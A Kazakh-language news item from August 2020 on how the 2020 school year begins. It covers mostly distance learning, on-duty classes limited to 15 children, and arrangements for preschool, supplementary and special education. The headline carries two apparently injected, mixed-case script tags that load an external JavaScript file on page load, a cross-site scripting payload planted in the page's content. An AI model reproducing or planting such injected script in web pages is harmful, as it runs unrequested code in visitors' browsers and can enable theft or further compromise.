1 қыркүйектен бастап оқу жылы жалпы қашықтан оқыту форматында басталады<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

07.08.2020

Орта білім

Шалғайдағы елді мекендердегі шағын жинақталған мектептер эпидемиологиялық ахуал жақсы болған жағдайда оқуды дәстүрлі түрде бастайды.

Бастауыш сынып оқушылары үшін, ата-аналардың өтініші негізінде, қатаң санитарлық талаптарды сақтай отырып, кезекші сыныптар жұмыс істейтін болады. Бір сыныпта бала саны 15-тен аспауы тиіс.

Кезекші сыныптарға өтініштер электронды түрде (сынып жетекшісі арқылы) қабылданады.

Қашықтан оқыту форматында - 2,6 млн (79%), кезекші сыныптарда - 530 мың (17%), штаттық түрде ауылдарда 157 мыңнан астам оқушы (4%) білім алады деп күтілуде.

Мектепке дейінгі ұйымдар

Ата-аналардың қалауы бойынша балалар кезекші топтарға қабылданады. Бұл топтарда бала саны 15-тен аспауы тиіс.

Қосымша білім беру ұйымдары

Балалар ата-аналардың өтініші негізінде қашықтан немесе жеке тәртіппен ұйымдастырылады. Шағын топтардағы бала саны 5-тен аспауы тиіс.

Арнайы білім беру ұйымдары

Ата-аналардың таңдауы бойынша арнайы онлайн кеңес беру немесе мамандардың жеке қабылдаулары ұйымдастырылады. Денсаулығында күрделі проблемалары бар балаларды қабылдау алдын ала жазылу тәртібімен жеке жүргізіледі.

Просмотров: 582


Пікір қосу



Деректерді қолтаңбаға қосу